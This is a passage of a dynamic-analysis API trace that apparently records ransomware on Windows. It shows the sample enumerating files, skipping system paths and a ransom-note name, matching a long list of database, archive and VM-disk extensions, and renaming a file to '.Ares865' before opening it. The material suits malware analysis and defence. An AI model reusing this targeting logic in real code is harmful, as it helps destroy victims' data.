(HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.933] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.933] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.934] CloseHandle (hObject=0x15c) returned 1 [0085.934] CloseHandle (hObject=0x118) returned 1 [0085.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0085.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.934] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74912800, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x74912800, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0xb960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GRINTL32.DLL.trx_dll", cAlternateFileName="GRINTL~1.TRX")) returned 1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2=".") returned 1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="..") returned 1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="windows") returned -1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="bootmgr") returned 1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="temp") returned -1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="boot") returned 1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="ids.txt") returned -1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="perflogs") returned -1 [0085.934] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="MSBuild") returned -1 [0085.934] lstrlenW (lpString="GRINTL32.DLL.trx_dll") returned 20 [0085.934] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll") returned 72 [0085.935] lstrcpyW (in: lpString1=0x2cce468, lpString2="GRINTL32.DLL.trx_dll" | out: lpString1="GRINTL32.DLL.trx_dll") returned="GRINTL32.DLL.trx_dll" [0085.935] lstrlenW (lpString="GRINTL32.DLL.trx_dll") returned 20 [0085.935] lstrlenW (lpString="Ares865") returned 7 [0085.935] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0085.935] lstrlenW (lpString=".dll") returned 4 [0085.935] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2=".dll") returned 1 [0085.935] lstrlenW (lpString=".lnk") returned 4 [0085.935] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2=".lnk") returned 1 [0085.935] lstrlenW (lpString=".ini") returned 4 [0085.935] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2=".ini") returned 1 [0085.935] lstrlenW (lpString=".sys") returned 4 [0085.935] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2=".sys") returned 1 [0085.935] lstrlenW (lpString="GRINTL32.DLL.trx_dll") returned 20 [0085.935] lstrlenW (lpString="bak") returned 3 [0085.935] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0085.935] lstrlenW (lpString="ba_") returned 3 [0085.935] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0085.935] lstrlenW (lpString="dbb") returned 3 [0085.935] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0085.935] lstrlenW (lpString="vmdk") returned 4 [0085.935] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0085.935] lstrlenW (lpString="rar") returned 3 [0085.935] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0085.935] lstrlenW (lpString="zip") returned 3 [0085.935] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0085.935] lstrlenW (lpString="tgz") returned 3 [0085.935] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0085.935] lstrlenW (lpString="vbox") returned 4 [0085.935] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0085.935] lstrlenW (lpString="vdi") returned 3 [0085.935] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0085.935] lstrlenW (lpString="vhd") returned 3 [0085.935] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0085.935] lstrlenW (lpString="vhdx") returned 4 [0085.935] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0085.935] lstrlenW (lpString="avhd") returned 4 [0085.935] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0085.935] lstrlenW (lpString="db") returned 2 [0085.936] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0085.936] lstrlenW (lpString="db2") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0085.936] lstrlenW (lpString="db3") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0085.936] lstrlenW (lpString="dbf") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0085.936] lstrlenW (lpString="mdf") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0085.936] lstrlenW (lpString="mdb") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0085.936] lstrlenW (lpString="sql") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0085.936] lstrlenW (lpString="sqlite") returned 6 [0085.936] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0085.936] lstrlenW (lpString="sqlite3") returned 7 [0085.936] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0085.936] lstrlenW (lpString="sqlitedb") returned 8 [0085.936] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0085.936] lstrlenW (lpString="xml") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0085.936] lstrlenW (lpString="$er") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0085.936] lstrlenW (lpString="4dd") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0085.936] lstrlenW (lpString="4dl") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0085.936] lstrlenW (lpString="^^^") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0085.936] lstrlenW (lpString="abs") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0085.936] lstrlenW (lpString="abx") returned 3 [0085.936] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0085.936] lstrlenW (lpString="accdb") returned 5 [0085.936] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0085.936] lstrlenW (lpString="accdc") returned 5 [0085.936] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0085.937] lstrlenW (lpString="accde") returned 5 [0085.937] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0085.937] lstrlenW (lpString="accdr") returned 5 [0085.937] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0085.937] lstrlenW (lpString="accdt") returned 5 [0085.937] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0085.937] lstrlenW (lpString="accdw") returned 5 [0085.937] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0085.937] lstrlenW (lpString="accft") returned 5 [0085.937] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0085.937] lstrlenW (lpString="adb") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0085.937] lstrlenW (lpString="adb") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0085.937] lstrlenW (lpString="ade") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0085.937] lstrlenW (lpString="adf") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0085.937] lstrlenW (lpString="adn") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0085.937] lstrlenW (lpString="adp") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0085.937] lstrlenW (lpString="alf") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0085.937] lstrlenW (lpString="ask") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0085.937] lstrlenW (lpString="btr") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0085.937] lstrlenW (lpString="cat") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0085.937] lstrlenW (lpString="cdb") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0085.937] lstrlenW (lpString="ckp") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0085.937] lstrlenW (lpString="cma") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0085.937] lstrlenW (lpString="cpd") returned 3 [0085.937] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0085.938] lstrlenW (lpString="dacpac") returned 6 [0085.938] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0085.938] lstrlenW (lpString="dad") returned 3 [0085.938] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0085.938] lstrlenW (lpString="dadiagrams") returned 10 [0085.938] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0085.938] lstrlenW (lpString="daschema") returned 8 [0085.938] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0085.938] lstrlenW (lpString="db-journal") returned 10 [0085.938] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0085.938] lstrlenW (lpString="db-shm") returned 6 [0085.938] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0085.938] lstrlenW (lpString="db-wal") returned 6 [0085.938] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0085.938] lstrlenW (lpString="dbc") returned 3 [0085.938] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0085.938] lstrlenW (lpString="dbs") returned 3 [0085.938] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0085.938] lstrlenW (lpString="dbt") returned 3 [0085.938] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0085.938] lstrlenW (lpString="dbv") returned 3 [0085.938] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0085.938] lstrlenW (lpString="dbx") returned 3 [0085.938] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0085.938] lstrlenW (lpString="dcb") returned 3 [0085.938] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0085.938] lstrlenW (lpString="dct") returned 3 [0085.938] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0085.938] lstrlenW (lpString="dcx") returned 3 [0085.938] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0085.938] lstrlenW (lpString="ddl") returned 3 [0085.938] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0085.938] lstrlenW (lpString="dlis") returned 4 [0085.938] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0085.938] lstrlenW (lpString="dp1") returned 3 [0085.938] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0085.938] lstrlenW (lpString="dqy") returned 3 [0085.938] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0085.939] lstrlenW (lpString="dsk") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0085.939] lstrlenW (lpString="dsn") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0085.939] lstrlenW (lpString="dtsx") returned 4 [0085.939] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0085.939] lstrlenW (lpString="dxl") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0085.939] lstrlenW (lpString="eco") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0085.939] lstrlenW (lpString="ecx") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0085.939] lstrlenW (lpString="edb") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0085.939] lstrlenW (lpString="epim") returned 4 [0085.939] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0085.939] lstrlenW (lpString="fcd") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0085.939] lstrlenW (lpString="fdb") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0085.939] lstrlenW (lpString="fic") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0085.939] lstrlenW (lpString="flexolibrary") returned 12 [0085.939] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0085.939] lstrlenW (lpString="fm5") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0085.939] lstrlenW (lpString="fmp") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0085.939] lstrlenW (lpString="fmp12") returned 5 [0085.939] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0085.939] lstrlenW (lpString="fmpsl") returned 5 [0085.939] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0085.939] lstrlenW (lpString="fol") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0085.939] lstrlenW (lpString="fp3") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0085.939] lstrlenW (lpString="fp4") returned 3 [0085.939] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0085.940] lstrlenW (lpString="fp5") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0085.940] lstrlenW (lpString="fp7") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0085.940] lstrlenW (lpString="fpt") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0085.940] lstrlenW (lpString="frm") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0085.940] lstrlenW (lpString="gdb") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0085.940] lstrlenW (lpString="gdb") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0085.940] lstrlenW (lpString="grdb") returned 4 [0085.940] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0085.940] lstrlenW (lpString="gwi") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0085.940] lstrlenW (lpString="hdb") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0085.940] lstrlenW (lpString="his") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0085.940] lstrlenW (lpString="ib") returned 2 [0085.940] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0085.940] lstrlenW (lpString="idb") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0085.940] lstrlenW (lpString="ihx") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0085.940] lstrlenW (lpString="itdb") returned 4 [0085.940] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0085.940] lstrlenW (lpString="itw") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0085.940] lstrlenW (lpString="jet") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0085.940] lstrlenW (lpString="jtx") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0085.940] lstrlenW (lpString="kdb") returned 3 [0085.940] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0085.940] lstrlenW (lpString="kexi") returned 4 [0085.940] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0085.941] lstrlenW (lpString="kexic") returned 5 [0085.941] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0085.941] lstrlenW (lpString="kexis") returned 5 [0085.941] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0085.941] lstrlenW (lpString="lgc") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0085.941] lstrlenW (lpString="lwx") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0085.941] lstrlenW (lpString="maf") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0085.941] lstrlenW (lpString="maq") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0085.941] lstrlenW (lpString="mar") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0085.941] lstrlenW (lpString="marshal") returned 7 [0085.941] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0085.941] lstrlenW (lpString="mas") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0085.941] lstrlenW (lpString="mav") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0085.941] lstrlenW (lpString="maw") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0085.941] lstrlenW (lpString="mdbhtml") returned 7 [0085.941] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0085.941] lstrlenW (lpString="mdn") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0085.941] lstrlenW (lpString="mdt") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0085.941] lstrlenW (lpString="mfd") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0085.941] lstrlenW (lpString="mpd") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0085.941] lstrlenW (lpString="mrg") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0085.941] lstrlenW (lpString="mud") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0085.941] lstrlenW (lpString="mwb") returned 3 [0085.941] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0085.941] lstrlenW (lpString="myd") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0085.942] lstrlenW (lpString="ndf") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0085.942] lstrlenW (lpString="nnt") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0085.942] lstrlenW (lpString="nrmlib") returned 6 [0085.942] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0085.942] lstrlenW (lpString="ns2") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0085.942] lstrlenW (lpString="ns3") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0085.942] lstrlenW (lpString="ns4") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0085.942] lstrlenW (lpString="nsf") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0085.942] lstrlenW (lpString="nv") returned 2 [0085.942] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0085.942] lstrlenW (lpString="nv2") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0085.942] lstrlenW (lpString="nwdb") returned 4 [0085.942] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0085.942] lstrlenW (lpString="nyf") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0085.942] lstrlenW (lpString="odb") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0085.942] lstrlenW (lpString="odb") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0085.942] lstrlenW (lpString="oqy") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0085.942] lstrlenW (lpString="ora") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0085.942] lstrlenW (lpString="orx") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0085.942] lstrlenW (lpString="owc") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0085.942] lstrlenW (lpString="p96") returned 3 [0085.942] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0085.942] lstrlenW (lpString="p97") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0085.943] lstrlenW (lpString="pan") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0085.943] lstrlenW (lpString="pdb") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0085.943] lstrlenW (lpString="pdm") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0085.943] lstrlenW (lpString="pnz") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0085.943] lstrlenW (lpString="qry") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0085.943] lstrlenW (lpString="qvd") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0085.943] lstrlenW (lpString="rbf") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0085.943] lstrlenW (lpString="rctd") returned 4 [0085.943] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0085.943] lstrlenW (lpString="rod") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0085.943] lstrlenW (lpString="rodx") returned 4 [0085.943] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0085.943] lstrlenW (lpString="rpd") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0085.943] lstrlenW (lpString="rsd") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0085.943] lstrlenW (lpString="sas7bdat") returned 8 [0085.943] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0085.943] lstrlenW (lpString="sbf") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0085.943] lstrlenW (lpString="scx") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0085.943] lstrlenW (lpString="sdb") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0085.943] lstrlenW (lpString="sdc") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0085.943] lstrlenW (lpString="sdf") returned 3 [0085.943] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0085.943] lstrlenW (lpString="sis") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0085.944] lstrlenW (lpString="spq") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0085.944] lstrlenW (lpString="te") returned 2 [0085.944] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0085.944] lstrlenW (lpString="teacher") returned 7 [0085.944] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0085.944] lstrlenW (lpString="tmd") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0085.944] lstrlenW (lpString="tps") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0085.944] lstrlenW (lpString="trc") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0085.944] lstrlenW (lpString="trc") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0085.944] lstrlenW (lpString="trm") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0085.944] lstrlenW (lpString="udb") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0085.944] lstrlenW (lpString="udl") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0085.944] lstrlenW (lpString="usr") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0085.944] lstrlenW (lpString="v12") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0085.944] lstrlenW (lpString="vis") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0085.944] lstrlenW (lpString="vpd") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0085.944] lstrlenW (lpString="vvv") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0085.944] lstrlenW (lpString="wdb") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0085.944] lstrlenW (lpString="wmdb") returned 4 [0085.944] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0085.944] lstrlenW (lpString="wrk") returned 3 [0085.944] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0085.944] lstrlenW (lpString="xdb") returned 3 [0085.945] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0085.945] lstrlenW (lpString="xld") returned 3 [0085.945] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0085.945] lstrlenW (lpString="xmlff") returned 5 [0085.945] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0085.945] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.Ares865") returned 80 [0085.945] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0085.946] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.946] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: 